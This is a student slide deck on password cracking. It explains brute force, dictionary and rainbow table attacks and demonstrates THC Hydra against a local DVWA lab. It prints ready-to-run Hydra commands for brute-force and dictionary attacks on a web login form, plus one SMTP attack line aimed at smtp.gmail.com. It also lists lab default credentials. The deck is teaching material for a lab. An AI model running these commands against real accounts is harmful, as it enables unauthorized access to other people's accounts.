BALLERIO SIMONE

GALASSO EMANUELE

CYBER SECURITY PROJECT

PASSWORD CRACKING
Summary
Password Cracking

Experiments Thc hydra

2
Password Cracking features
What is password cracking?

Online Attack Offline Attack

Dictionary Attack Brute Force

Raibow table Hybrid tecniques

3
What is password cracking?

Password cracking is the process of attempting to gain unauthorized

access to restricted systems using common passwords or
algorithms that guess passwords.

4
How is stored a Password?

Password Hashed Password

HASH FUNCTION

5
Online VS Offline Cracking

Try a large number of username/password Try to get the hash of the password in
combinations against the login portal offline situation and then crack them
trying to find the clear-text value that
computes to that hash.

limited by the speed of the network Limited by the speed of the hacker’s machine

6
Brute Force Attack
Try all the possible combination of characters.

Depends only on the length of the password and on the system used

We are sure at 100% to find the password but we don’t know how longer will be the process.

7
Example Brute Force
PROBLEM
Let’s consider for a moment to be in an environment where all the power of the systems are
equal to each other, and consider that we should have to find a Password composed only by 8
alpha numeric characters.
How many attempts do we have to do in the worst case?

Consideration
Alpha numeric characters are: a...z, A...Z, 0...9 = 64 possibilities.
We already know the username.
The solution depends only on the length of the password.
Knowing the exactly length of the password always simplify the job.
8
Example Brute Force
SOLUTION

648 possible combinations (Disposition with ripetition 𝐷r𝑛𝑘 = 𝑛𝑘 )

9
Dictionary Attack
Try all the strings in a pre-arranged listing.

Depends on the complexity of the password and on it’s no ordinary meaning.

There are less chance of arriving at a solution, but if we arrive is in relatively fast time.

10
Example Dictionary Attack

PROBLEM
Let’s consider a Dictionary Attack with the French dictionary, where there are roughly 135.000
words.

Solution
We can found a common French Password just trying 135.000 times.
.

11
Rainbow table Attack

It is a pre-computed dictionary of plain text

passwords and their corresponding hash value.

More than one text can produce the same hash, it’s
not important to know what the original password
really was.

Salting passwords is a common method of

preventing rainbow table attacks.

12
Salting Passwords
SAME PASSWORD = SAME HASH STORED
BOB ALICE

13
Hybrid Attack

Hybrid Dictionary

Background knowledge Dictionary

Maximize your chances of success

14
Experiments

15
Tools
Kali Linux is an
advanced
penetration
testing distribution

Hydra is a
parallelized login
cracker

Damn Vulnerable
Web App

16
Kali Linux
Kali contains several hundred tools which are geared towards various
information security tasks, such as:

Penetration Testing Computer Forensics

Security research Reverse Engineering

Kali Linux is developed, funded and maintained by Offensive Security, a

leading information security training company.

17
Hydra

• Is very fast and flexible

• New modules are easy to add

• Show how easy it would be to gain unauthorized

access to a system remotely

18
DVWA (Damn Vulnerable Web App)
Ethical hackers test their skills and run tools in a legal environment.

• For beginners and advanced users to proof their skill DVWA is the best platform.

• This is the best place to do hacking.

• Helps web developer better understand the processes of securing web

applications

19
Idea of Experiments

In the current experiments, a password cracking is proposed connected to the

discovery of the [user-password] pair relative to the access credentials located
within the DVWA special software program.

20
Brute Force

hydra -L user.txt -x 1:5:a -F -w 10 -V 127.0.0.1

http -get -form "/DVWA/vulnerabilities/brute/
:username =^USER^& password =^PASS^&Login=Login
:S=Welcome to the password protected area
:H=Cookie: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk

21
Brute Force

hydra -L user.txt -x 1:5:a -F -w 10 -V 127.0.0.1

http -get -form "/DVWA/vulnerabilities/brute/
:username =^USER^& password =^PASS^&Login=Login
:S=Welcome to the password protected area
:H=Cookie: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk

22
Brute Force

In this case it is not possible to show the solution because the password
combinations are very high and therefore would take a long time.

23
Dictionary Attack

hydra –l admin -P rockyou.txt -e ns -F -u -w 10 -v-V 127.0.0.1

http -get -form "/DVWA/vulnerabilities/brute/
:username =^USER^& password =^PASS^&Login=Login
:S=Welcome to the password protected area
:H=Cookie : security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"

24
Dictionary Attack

hydra –l admin -P rockyou.txt -e ns -F -u -w 10 -v-V 127.0.0.1

http -get -form "/DVWA/vulnerabilities/brute/
:username =^USER^& password =^PASS^&Login=Login
:S=Welcome to the password protected area
:H=Cookie : security=medium; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"

25
Dictionary Attack

• Low: This security level is completely vulnerable and has no security

measures at all.

• Medium: This setting is mainly to give an example to the user of

bad security practices, where the developer has tried but failed to
secure an application.

26
Dictionary Attack

27
Smtp Attack

hydra smtp.gmail.com -l [email protected] -P temp -s 465 -S -V -f smtp

28
Other Possible Experiments

THC-Hydra supports many different services:

• Afp • Https-head • Ncp

• Cisco • Https-form-get • Nntp
• Cvs • Https-form-post • Oracle-listener
• Firebird • Imap • Pcanywhere
• Ftp • Smb • Pop3
• Http-get • Ldap2 • Postgres
• Http-head • Ldap3 • Rexecsnmp
• Http-proxy • Mssql • Smtp
• Https-get • Mysql • Telnet

29
CONCLUSION
• Use passwords that are long at least 15 characters.

• Don't use the same password for privileged

user accounts between systems.

• Don't share it.

30
Thanks for the attention

31
How to test
Virtual box: https://www.virtualbox.org/wiki/Downloads

Kali linux : https://linoxide.com/distros/learn-method-install-

kali-linux-virtualbox/
DVWA installation:
https://medium.com/datadriveninvestor/setup-install-dvwa-
into-your-linux-distribution-d76dc3b80357

If you have any type of problem during the installation contact us, and we will give you a
.vdi file of the virtual machine with all the installations that you need.
32
How to test

33
How to test

Username: root

Password: toor

34
How to test

35
How to test

1. service apache2 start

2. service mysql start

36
How to test
http://127.0.0.1/DVWA/login.php

Username: admin
Password: password

37
How to test
3

38
How to test
NOW YOU ARE IN THIS PAGE:

39
How to test
Right-click:
1

2(Select)
3

40
How to test
Test it and have fun: Pure Brute Force:
hydra -L user.txt -x 1:5:a -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=
Welcome to the password protected area:H=Cookie\: security=medium;
PHPSESSID=INSERT PHPSESSID"

Dictionary Attack:
hydra -l admin -P rockyou.txt -F -V 127.0.0.1 http-get-form
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=
Welcome to the password protected area:H=Cookie\: security=medium;
PHPSESSID=INSERT PHPSESSID"

Try: hydra -h , for more information

ENJOY!
42